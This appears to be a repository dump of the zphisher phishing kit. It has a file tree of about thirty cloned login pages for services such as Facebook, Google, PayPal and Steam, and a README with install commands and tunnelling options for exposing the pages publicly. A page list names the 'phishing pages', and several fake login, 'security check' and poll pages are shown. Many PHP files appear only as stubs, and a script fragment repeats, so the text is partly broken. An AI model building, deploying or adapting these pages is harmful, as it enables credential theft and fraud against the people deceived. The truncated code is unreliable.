├── LICENSE ├── README.md ├── websites ├── Pages.md ├── adobe │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── badoo │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── cryptocoinsniper │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── deviantart │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── dropbox │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── ebay │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── facebook │ ├── index.php │ ├── index_files │ │ ├── 3tW4Se3Q8lp.js │ │ ├── 5jrVXfAROiJ.js │ │ ├── 75A8CjRhJNV.js │ │ ├── 9-E7joN6RrB.js │ │ ├── BH1U8-oWSz-.js │ │ ├── GsNJNwuI-UM.gif │ │ ├── IhUXDwDlznYG7VZ0A3yuLJXPLrkxHnGU-rE_nXNj-Zk.js │ │ ├── KCi7ntWTG14.js │ │ ├── OBaVg52wtTZ.png │ │ ├── SuIZL5aHqA4.css │ │ ├── WWXflhzoV6u.js │ │ ├── YxMGVj7VwHT.js │ │ ├── Zv2K34UsWYP.js │ │ ├── _fa_Q_Q3Yqm.css │ │ ├── anchor.html │ │ ├── api.js │ │ ├── bemu-nylANY.js │ │ ├── bframe.html │ │ ├── lZ86cv9aR90.css │ │ ├── pAzbdV2KKwn.js │ │ ├── papglo0-Qhp.js │ │ ├── qFPB0xXT86s.js │ │ ├── recaptcha__en.js │ │ ├── sG3ppFfyKv1.js │ │ ├── styles__ltr.css │ │ ├── uTqzUx0zOSn.css │ │ ├── v4WgC_pJT9B.js │ │ └── v8LqVVCx3AJ.js │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── mobile.html │ └── mobile_files │ │ ├── 2W8M8HEqExc.js │ │ ├── 3ZZmKyhKzV5.js │ │ ├── 7ssg83RQmKQ.js │ │ ├── BeABftOMOi3.js │ │ ├── JhriIry2uhb.js │ │ ├── K_KbLZMIwBQ.js │ │ ├── MVTXY3yLQW6.js │ │ ├── Tvjn6wSRfob.css │ │ ├── V0Om-DH9YTH.css │ │ ├── kiz4-aETZgZ.js │ │ ├── q4ynzKxD5Cd.js │ │ └── v4WgC_pJT9B.js ├── fb_advanced │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── fb_messenger │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── fb_security │ ├── fb-ico.png │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── logo.png │ └── style.css ├── github │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── google_new │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── google_poll │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── ig_followers │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── ig_verify │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── login2.php │ └── login3.html ├── instagram │ ├── 001bc33056c1.jpg │ ├── 2d9d7248af43.jpg │ ├── 4b70f6fae447.png │ ├── 629d23a3c7b2.jpg │ ├── 96f2557117a2.js.download │ ├── 9e7638226e17.png │ ├── aafd8c6b005d.jpg │ ├── b67d172d5783.js.download │ ├── d1f0f06b39df.js.download │ ├── f06b908907d5.png │ ├── f55c258e826e.png │ ├── f5ae123ab1e2.jpg │ ├── f9e5c0ca0804.js.download │ ├── fb48443ec9d3.png │ ├── index.php │ ├── ip.php │ ├── lY4eZXm_YWu.html │ ├── login.html │ ├── login.php │ └── sdk.js.download ├── linkedin │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ └── mobile.html ├── microsoft │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── boot.css │ ├── boot.js │ ├── boot_002.js │ ├── boot_003.js │ ├── boot_004.js │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── microsoft_logo.svg │ ├── prefetch.html │ ├── sprite1.css │ └── sprite1.png ├── netflix │ ├── FB-f-Logo__blue_57.png │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── none.css │ ├── none.js │ ├── none_002.js │ ├── sdk.js │ └── xaOI6zd9HW9.html ├── origin │ ├── EA_Origin_Lockup_Black.png │ ├── analytics.js │ ├── api.js │ ├── css.css │ ├── iframe_api.js │ ├── index.php │ ├── ip.php │ ├── jquery-1.js │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── login.html │ ├── login.php │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── otk.css │ ├── recaptcha__en.js │ ├── sha.js │ ├── utag.js │ ├── utag_002.js │ └── www-widgetapi.js ├── paypal │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── pinterest │ ├── 130492214192672 │ ├── 25936583-postmessagerelay.js │ ├── 3723580519-idpiframe.js │ ├── Z4_JZrbn7cR.js │ ├── aMltqKRlCHD.png │ ├── cbgapi.loaded_0 │ ├── cbgapi.loaded_1 │ ├── cbgapi.loaded_2 │ ├── cbgapi.loaded_3 │ ├── clientplusone.js │ ├── common_desktop-cc5955b1658b3049a89a8e74824afa2e.css │ ├── entryChunk-www-42ec251dd63eb28f1a3e87da28288e59.css │ ├── entryChunk-www-unauth-a04e2ef9d883ee259f83.js │ ├── fbevents.js │ ├── gestalt-039ab764a920c98697f74f32bdf681a1.css │ ├── iframe.html │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── login_button.html │ ├── pjs-0-5d015373385578e0d2c4.js │ ├── pjs-22-c150d8ee52dea5f25e55.js │ ├── pjs-231-02ef0f57734d26cb9029.js │ ├── pjs-49-388b2e3857b09960543d.js │ ├── pjs-51-02ea5c5c9fb36b662bcf.js │ ├── pjs-locale-en_US-lite-3dcf38fa608036c641ca.js │ ├── postmessageRelay.html │ ├── rpcshindig_random.js │ ├── sdk.js │ ├── sdk_002.js │ ├── sdk_003.js │ ├── signin.html │ ├── vendor-react-d20f99c48b5d58e4821c.js │ └── xaOI6zd9HW9.html ├── playstation │ ├── 0a674de1f2362e0247eec6e1d770e │ ├── S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download │ ├── anchor.html │ ├── api.js.download │ ├── bframe.html │ ├── button_icon_password_off.png │ ├── index.php │ ├── ip.php │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── kekka-6225c71c3ba0a25429287cf2bec55f12.js.download │ ├── loading.png │ ├── loading_base.png │ ├── login.html │ ├── login.php │ ├── logo_playstation.png │ ├── pc-7cc7759e91c65baf3b78fd4eb4402c4f.css │ ├── recaptcha__en_gb.js.download │ ├── saved_resource │ ├── saved_resource(1) │ ├── siews1lib.js.download │ ├── sony_logo.png │ ├── styles__ltr.css │ ├── ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download │ ├── unifiedfooter.en-gb.js.download │ ├── vendor-05c320ffd8d18cdbde15fa028ff545b7.js.download │ ├── vendor-571d67531622102402268bd2c623c17f.css │ └── wallpaper.jpg ├── protonmail │ ├── app.js │ ├── appLazy.js │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── openpgp.js │ ├── styles.css │ ├── vendor.js │ └── vendorLazy.js ├── reddit │ ├── ProductionClient.62deff0b1c9fbf3af019.js │ ├── index.php │ ├── ip.php │ ├── login.ec234f177c42a52ad0ff.js │ ├── login.html │ ├── login.php │ └── mobile.html ├── snapchat │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── spotify │ ├── analytics.js │ ├── anchor.html │ ├── api.js │ ├── bframe.html │ ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js │ ├── index.css │ ├── index.js │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── recaptcha__en.js │ └── styles__ltr.css ├── stackoverflow │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── steam │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── twitch │ ├── JW5GlLnAsFw.html │ ├── anchor.html │ ├── bframe.html │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── passport_c1c69fb78df507864cef288318faf1b7.css │ └── styles__ltr.css ├── twitter │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php ├── vk │ ├── b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download │ ├── b-93dd9d3be5cab15401cc628b931eb724.9cac7b4a6901a4dab64f.js.download │ ├── common.6d5af9c51c7e29087e36.js.download │ ├── common.css │ ├── counter │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── p │ ├── polyfills.c5f9a2ced681ad88809a.js.download │ └── vendors.2773b57485e379f375b2.js.download ├── vk_poll │ ├── counter.gif │ ├── hit.gif │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── p.gif │ ├── result.html │ ├── s_c.js │ ├── s_cfmxw.css │ ├── s_yzgt.css │ ├── s_z.js │ └── top_logo.png ├── wordpress │ ├── index.php │ ├── ip.php │ ├── load-styles.css │ ├── login.html │ ├── login.php │ └── wordpress-logo.svg ├── yahoo │ ├── index.php │ ├── ip.php │ ├── login.html │ ├── login.php │ ├── mobile.html │ └── yahoo_en-US_f_p_bestfit_2x.png └── yandex │ ├── index.php │ ├── ip.php │ ├── login.html │ └── login.php └── zphisher.sh /README.md: -------------------------------------------------------------------------------- 1 |

2 | 3 |

4 |

5 | 6 |

7 |

8 | 9 | 10 |

11 |

12 | 13 | 14 | 15 | 16 | 17 | 18 |

19 | 20 | ## Installation : 21 | 22 | * `apt update` 23 | * `apt install git curl php openssh -y` 24 | * `git clone git://github.com/htr-tech/zphisher.git` 25 | * `cd zphisher` 26 | #### > Run : `bash zphisher.sh` 27 | 28 | ## Single Command : 29 | ``` 30 | apt update ; apt install git curl php openssh -y ; git clone git://github.com/htr-tech/zphisher.git ; cd zphisher ; bash zphisher.sh 31 | ``` 32 |
33 |

34 | 35 | 36 |

37 | 38 | ### <<< If you copy , Then Give me The Credits >>> 39 | 40 | ## Features : 41 | #### [+] Latest Login Pages ! 42 | #### [+] New Instagram Auto Follower Page ! 43 | #### [+] 4 Port Forwarding Options ! 44 | #### [+] Easy for Beginners ! 45 | 46 | ## Credits : 47 | #### > TheLinuxChoice (https://github.com/thelinuxchoice) 48 | #### > DarksecDevelopers (https://github.com/DarksecDevelopers) 49 | #### > UndeadSec (https://github.com/UndeadSec) 50 | 51 | ## Tunelling Options : 52 | #### > Localhost (127.0.0.1) 53 | #### > NGROK (https://ngrok.com) 54 | #### > SERVEO (https://serveo.net) 55 | #### > LOCALHOSTRUN (https://localhost.run) 56 | 57 | ## Find Me on : 58 | [![Github](https://img.shields.io/badge/Github-HTR--TECH-green?style=for-the-badge&logo=github)](https://github.com/htr-tech) 59 | [![Instagram](https://img.shields.io/badge/IG-%40tahmid.rayat-red?style=for-the-badge&logo=instagram)](https://www.instagram.com/tahmid.rayat) 60 | [![Messenger](https://img.shields.io/badge/Chat-Messenger-blue?style=for-the-badge&logo=messenger)](https://m.me/tahmid.rayat.official) 61 | 62 | 63 | -------------------------------------------------------------------------------- /websites/Pages.md: -------------------------------------------------------------------------------- 1 | # **ZPhisher** 2 | #### Powered by ***HTR-TECH*** (**@tahmid.rayat**) 3 | *** 4 | *** 5 | I am not responsible for any misuse of this tool. 6 | *** 7 | *** 8 | # Available Phishing Pages 9 | **1) Facebook:** 10 | - Facebook Normal Login Page 11 | - Fake Security Login Method (DarkSecDevelopers) 12 | - Facebook Voting Poll Method (DarkSecDevelopers) 13 | - Messenger Login Page (New) 14 | 15 | **2) Instagram:** 16 | - Normal Login Page 17 | - Instagram Auto Follower Phishing Page (thelinuxchoice) 18 | - Instagram Badge Verify Method (DarkSecDevelopers) 19 | 20 | **3) Google** 21 | - Google Old Login Page 22 | - Google New Login Page 23 | - Google Voting Poll Method (DarkSecDevelopers) 24 | 25 | **4) Adobe Login Page** 26 | 27 | **5) Badoo Login Page** 28 | 29 | **6) CryptoCoinSniper Login Page** 30 | 31 | **7) Deviantart Login Page** 32 | 33 | **8) Dropbox Login Page** 34 | 35 | **9) Ebay Login Page** 36 | 37 | **10) Github Login Page** 38 | 39 | **11) Linkedin Login Page** 40 | 41 | **12) Microsoft Login Page** 42 | 43 | **13) Netflix Login Page** 44 | 45 | **14) Origin Login Page** 46 | 47 | **15) Paypal Login Page** 48 | 49 | **16) Pinterest Login Page** 50 | 51 | **17) Playstation Login Page** 52 | 53 | **18) Protonmail Login Page** 54 | 55 | **19) Reddit Login Page** 56 | 57 | **20) Snapchat Login Page** 58 | 59 | **21) Spotify Login Page** 60 | 61 | **22) Stackoverflow Login Page** 62 | 63 | **23) Steam Login Page** 64 | 65 | **24) Twitch Login Page** 66 | 67 | **25) Twitter Login Page** 68 | 69 | **26) Vk Login Page** 70 | 71 | **27) Vk Poll Method (Hiddeneye)** 72 | 73 | **28) Wordpress Login Page** 74 | 75 | **29) Yahoo Login Page** 76 | 77 | **30) Yandex Login Page** 78 | *** 79 | *** 80 | 81 | ***Donot Copy My Work*** 82 | -------------------------------------------------------------------------------- /websites/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/adobe/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/badoo/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/cryptocoinsniper/ip.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | Crypto Coin Sniper - Dashboard | Login 11 | 12 | 16 | 17 | 18 | 19 | 20 |
21 |
22 |
23 |
24 |
25 |
26 | 28 |

Hello! let's get started

29 |
Sign in to continue.
30 |
31 |
32 |
33 |
34 |
35 | 36 |
37 | Forgot password? 38 |
39 |
40 | Just signed up? Check your inbox and junk email now, we have sent you your user name and password. 41 |
42 |
43 |
44 |
45 |
46 | 47 |
48 | 49 |
50 | 51 | 52 | 53 | 54 | 86 | 87 | 88 | 89 | 107 | 108 | 114 | 115 | 116 | -------------------------------------------------------------------------------- /websites/cryptocoinsniper/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/deviantart/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/dropbox/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/ebay/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/facebook/index_files/GsNJNwuI-UM.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/d9ba6dd172294ae8aefa6ea391f47b265c6ecff9/websites/facebook/index_files/GsNJNwuI-UM.gif -------------------------------------------------------------------------------- /websites/facebook/index_files/OBaVg52wtTZ.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dafthack/zphisher/d9ba6dd172294ae8aefa6ea391f47b265c6ecff9/websites/facebook/index_files/OBaVg52wtTZ.png -------------------------------------------------------------------------------- /websites/facebook/index_files/api.js: -------------------------------------------------------------------------------- 1 | /* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var CFG='___grecaptcha_cfg';if(!window[CFG]){window[CFG]={};}var GR='grecaptcha';if(!window[GR]){window[GR]={};}window[GR].ready=window[GR].ready||function(f){(window[CFG]['fns']=window[CFG]['fns']||[]).push(f);};(window[CFG]['render']=window[CFG]['render']||[]).push('onload');window['__google_recaptcha_client']=true;var po=document.createElement('script');po.type='text/javascript';po.async=true;po.src='https://www.gstatic.com/recaptcha/api2/v1560753160450/recaptcha__en.js';var elem=document.querySelector('script[nonce]');var n=elem&&(elem['nonce']||elem.getAttribute('nonce'));if(n){po.setAttribute('nonce',n);}var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(po, s);})(); -------------------------------------------------------------------------------- /websites/facebook/index_files/bframe.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | reCAPTCHA 7 | 178 | 179 | 180 | 183 | 184 |
-------------------------------------------------------------------------------- /websites/facebook/index_files/v4WgC_pJT9B.js: -------------------------------------------------------------------------------- 1 | if (self.CavalryLogger) { CavalryLogger.start_js(["FEt5G"]); } 2 | 3 | __d("CavalryLoggerImpl",["Arbiter","Banzai","Bootloader","ImageTimingHelper","ISB","KillabyteProfilerConfig","NavigationTimingHelper","PageEvents","PageletEventConstsJS","PageletEventsHelper","PerfXLogger","ResourceTimingBootloaderHelper","ScriptPath","performance","performanceAbsoluteNow","__getTotalFactories","__getCompileTime","__getFactoryTime"],(function(a,b,c,d,e,f){__p&&__p();var g=b("KillabyteProfilerConfig").htmlProfilerModule,h=b("KillabyteProfilerConfig").profilerModule,i="cavalry",j=["t_start","t_paint","t_cstart"],k=window.CavalryLogger;Object.assign(k.prototype,{initializeInstrumentation:function(){__p&&__p();if(this.instrumentation_started)return;var c=this;b("Arbiter").subscribe("BigPipe/init",function(a,b){b.lid==c.lid&&b.arbiter&&(c._recordTTIEvent(b.arbiter,"tti_bigpipe"),c._recordDisplayedEvent(b.arbiter,"all_pagelets_displayed"),c._recordLoadedEvent(b.arbiter,"all_pagelets_loaded"),c._recordPageletEventsTime(b.arbiter))});b("Arbiter").subscribe("MRenderingScheduler/init",function(a,b){b.lid==c.lid&&(c._recordTTIEvent(b.arbiter,"MRenderingScheduler/tti"),c._recordDisplayedEvent(b.arbiter,"MRenderingScheduler/dd"),c._recordLoadedEvent(b.arbiter,"MRenderingScheduler/e2e"),c._recordPageletEventsTime(b.arbiter))});b("Arbiter").subscribe(b("PageEvents").BIGPIPE_ONLOAD,function(d,e){a.bigPipe&&c.lid===a.bigPipe.lid&&c.addPiggyback("cjs_factory_count_e2e",b("__getTotalFactories")()).addPiggyback("cjs_compile_time_e2e",b("__getCompileTime")()).addPiggyback("cjs_factory_time_e2e",b("__getFactoryTime")())});c.addPiggyback("script_path",b("ScriptPath").getScriptPath());this.is_detailed_profiler&&b("PageletEventsHelper").init();this.instrumentation_started=!0},_recordTTIEvent:function(a,b){__p&&__p();var c=this;a.subscribe(b,function(a,b){if(b.lid==c.lid){if(b.metrics)for(var d in b.metrics)c.addPiggyback(d,b.metrics[d]);b.usageSnapshot&&(c.ttiUsageSnapshot=b.usageSnapshot);c._setTTIPhase(b.phase).measurePageLoad(!0,b.ts);c.setAbsTimeStamp("t_bigpipe_tti",b.ts,!0)}})},_recordDisplayedEvent:function(a,b){var c=this;a.subscribe(b,function(a,b){b.lid===c.lid&&(b.usageSnapshot&&(c.ddUsageSnapshot=b.usageSnapshot),c.setAbsTimeStamp("t_marker_all_pagelets_displayed",b.ts,!0))})},_recordLoadedEvent:function(a,b){var c=this;a.subscribe(b,function(a,b){b.lid===c.lid&&c.setAbsTimeStamp("t_marker_bigpipe_e2e",b.ts,!0)})},_recordPageletEventsTime:function(a){__p&&__p();if(this.is_detailed_profiler){var c=this;a.subscribe("pagelet_event",function(a,d){if(d.lid==c.lid){a=d.id;c.events[a]=c.events[a]||{};c.events[a][d.event]=d.ts-window._cstart;d.event===b("PageletEventConstsJS").ARRIVE_END&&(c.events[a].phase=d.phase)}})}},_setTTIPhase:function(a){this.addPiggyback("tti_phase",a);return this},setTimeStamp:function(a,c,d,e){this.mark(a);var f=this.values.t_cstart||this.values.t_start;f=e?f+e:b("performanceAbsoluteNow")();this.setValue(a,f,c,d);this.tti_event&&a==this.tti_event&&this.measurePageLoad(c);return this},setAbsTimeStamp:function(a,b,c,d){this.setValue(a,b,c,d);this.tti_event&&a==this.tti_event&&this.measurePageLoad(c,b);return this},log:function(){__p&&__p();var a={lid:this.lid};b("ISB").token&&(a.fb_isb=b("ISB").token);this.addPiggyback("pagelet_events",b("PageletEventsHelper").getMetrics(this.lid));this.setValue("client_pixel_ratio_10x",parseInt((window.devicePixelRatio||1)*10,10));this._moveBootloaderData();a=babelHelpers["extends"]({t_creport:b("performanceAbsoluteNow")()},a,this.values,this.piggy_values);var c=window.__bodyWrapper;if(c.getCodeUsage&&h){if(!this.start||!this.e2e||!this.dd)throw new Error("Timestamps are missing in Cavalry. Please report this to the Web Speed team");var d=h.findUsedCSSSelectors(document,h.getDocumentStylesheets(document));d={js_calls:JSON.stringify(c.getCodeUsage()),css_selectors:JSON.stringify(d),bootloads:JSON.stringify(this._getBootloadsUntil(this.e2e))};g&&(d.html=JSON.stringify(g.getKillabyteHTMLData()));var e=babelHelpers["extends"]({},h.getDataForSnapshot(this.ddUsageSnapshot),{bootloads:JSON.stringify(this._getBootloadsUntil(this.dd))});d={e2e:d,dd:e};if(this.ttiUsageSnapshot){if(!this.tti)throw new Error("tti timestamp should always be present if we have usage data");d.tti=babelHelpers["extends"]({},h.getDataForSnapshot(this.ttiUsageSnapshot),{bootloads:JSON.stringify(this._getBootloadsUntil(this.tti))})}b("Arbiter").inform("cavalry_usage_data_collected",{usageData:d,lid:this.lid},"state");c.clearCodeUsage()}e=b("PerfXLogger").getPayload(a.lid);e&&this._logPerfXPiggybacks(a,e);b("Banzai").post(i,a,b("Banzai").VITAL);d=this.values;this.values={};this.piggy_values={};for(var c=0;c=c.start&&b<=a}).map(function(a){var b=a[0];a[1];return b})},measurePageLoad:function(a,b){b?this.setAbsTimeStamp("t_tti",b,a):this.setTimeStamp("t_tti",a),this._collectMetrics(a)},collectBrowserTiming:function(a){if(b("performance").timing){this.start=b("performance").timing.navigationStart;this.tti=this.values.t_bigpipe_tti;this.dd=this.values.t_marker_all_pagelets_displayed;this.e2e=this.values.t_onload;a=b("NavigationTimingHelper").getNavTimings();this.addPiggyback("navigation_timing",a);this.log_resources&&(this.addPiggyback("resource_timing_bootloader",b("ResourceTimingBootloaderHelper").getMetrics(0,!1).data),this._collectTTIAndE2EWithImages())}},collectTimingForAsync:function(a,c){__p&&__p();if(!c)return;if(b("performance").timing&&b("performance").getEntriesByName){a=b("performance").getEntriesByName(c);if(a.length===0)return;this.start=b("performance").timing.navigationStart+a[0].startTime;this.tti=this.values.t_bigpipe_tti;this.e2e=this.values.t_onload;c=b("NavigationTimingHelper").getAsyncRequestTimings(c);this.addPiggyback("navigation_timing",c);this.log_resources&&(this.addPiggyback("resource_timing_bootloader",b("ResourceTimingBootloaderHelper").getMetrics(a[0].startTime,!1).data),this._collectTTIAndE2EWithImages())}},_collectTTIAndE2EWithImages:function(){var a=b("performance").timing.navigationStart,c=this.values.t_bigpipe_tti,d=this.values.t_marker_bigpipe_e2e,e=b("ImageTimingHelper").getImageTimings(this.lid);c=b("ResourceTimingBootloaderHelper").getLastTTIAndE2EImageResponseEnds(c,d,e);!isNaN(c.TTI)&&c.TTI!==a&&this.setAbsTimeStamp("t_tti_with_images",c.TTI);!isNaN(c.E2E)&&c.E2E!==a&&this.setAbsTimeStamp("t_marker_bigpipe_e2e_with_images",c.E2E)}});Object.assign(k,{startInstrumentation:function(){for(var a in k.instances){var b=k.instances[a];b.initializeInstrumentation();"t_tti"in b.values&&b.measurePageLoad(!1,b.values.t_tti)}},hookLogOnLoad:function(a){b("Arbiter").registerCallback(function(){k.setPageID(a),k.instances[a].log()},[b("PageEvents").NATIVE_ONLOAD])},hookCollectAndLogOnLoad:function(a){b("Arbiter").registerCallback(function(){k.getInstance(a).collectBrowserTiming(),k.getInstance(a).log()},[b("PageEvents").BIGPIPE_ONLOAD])}});e.exports=k}),null); -------------------------------------------------------------------------------- /websites/facebook/ip.php: -------------------------------------------------------------------------------- 1 | =c.start&&b<=a}).map(function(a){var b=a[0];a[1];return b})},measurePageLoad:function(a,b){b?this.setAbsTimeStamp("t_tti",b,a):this.setTimeStamp("t_tti",a),this._collectMetrics(a)},collectBrowserTiming:function(a){if(b("performance").timing){this.start=b("performance").timing.navigationStart;this.tti=this.values.t_bigpipe_tti;this.dd=this.values.t_marker_all_pagelets_displayed;this.e2e=this.values.t_onload;a=b("NavigationTimingHelper").getNavTimings();this.addPiggyback("navigation_timing",a);this.log_resources&&(this.addPiggyback("resource_timing_bootloader",b("ResourceTimingBootloaderHelper").getMetrics(0,!1).data),this._collectTTIAndE2EWithImages())}},collectTimingForAsync:function(a,c){__p&&__p();if(!c)return;if(b("performance").timing&&b("performance").getEntriesByName){a=b("performance").getEntriesByName(c);if(a.length===0)return;this.start=b("performance").timing.navigationStart+a[0].startTime;this.tti=this.values.t_bigpipe_tti;this.e2e=this.values.t_onload;c=b("NavigationTimingHelper").getAsyncRequestTimings(c);this.addPiggyback("navigation_timing",c);this.log_resources&&(this.addPiggyback("resource_timing_bootloader",b("ResourceTimingBootloaderHelper").getMetrics(a[0].startTime,!1).data),this._collectTTIAndE2EWithImages())}},_collectTTIAndE2EWithImages:function(){var a=b("performance").timing.navigationStart,c=this.values.t_bigpipe_tti,d=this.values.t_marker_bigpipe_e2e,e=b("ImageTimingHelper").getImageTimings(this.lid);c=b("ResourceTimingBootloaderHelper").getLastTTIAndE2EImageResponseEnds(c,d,e);!isNaN(c.TTI)&&c.TTI!==a&&this.setAbsTimeStamp("t_tti_with_images",c.TTI);!isNaN(c.E2E)&&c.E2E!==a&&this.setAbsTimeStamp("t_marker_bigpipe_e2e_with_images",c.E2E)}});Object.assign(k,{startInstrumentation:function(){for(var a in k.instances){var b=k.instances[a];b.initializeInstrumentation();"t_tti"in b.values&&b.measurePageLoad(!1,b.values.t_tti)}},hookLogOnLoad:function(a){b("Arbiter").registerCallback(function(){k.setPageID(a),k.instances[a].log()},[b("PageEvents").NATIVE_ONLOAD])},hookCollectAndLogOnLoad:function(a){b("Arbiter").registerCallback(function(){k.getInstance(a).collectBrowserTiming(),k.getInstance(a).log()},[b("PageEvents").BIGPIPE_ONLOAD])}});e.exports=k}),null); -------------------------------------------------------------------------------- /websites/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/fb_advanced/ip.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /websites/fb_advanced/login.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 109 | 110 |
111 |

VOTERANK

112 |

#289032

113 |
114 | 127 | 128 | -------------------------------------------------------------------------------- /websites/fb_advanced/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /websites/fb_messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/fb_messenger/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/fb_security/ip.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Security Check 6 | 7 | 8 | 9 | 10 |
11 |
12 | 15 |
16 |
17 |
18 |
19 | 22 |
23 |

Verify needed to understand it's you

24 |

Enter your password for security reason (make sure your caps lock is off)

25 |

Forgot your password ? Request new one 26 |

27 | 28 | 39 | 40 |
41 | 42 | 67 |
68 | 69 | 70 | -------------------------------------------------------------------------------- /websites/fb_security/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/github/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/google/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/google_new/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /websites/google_poll/ip.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /websites/google_poll/login.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 118 | 119 |
120 |

VOTERANK

121 |

#289032

122 |
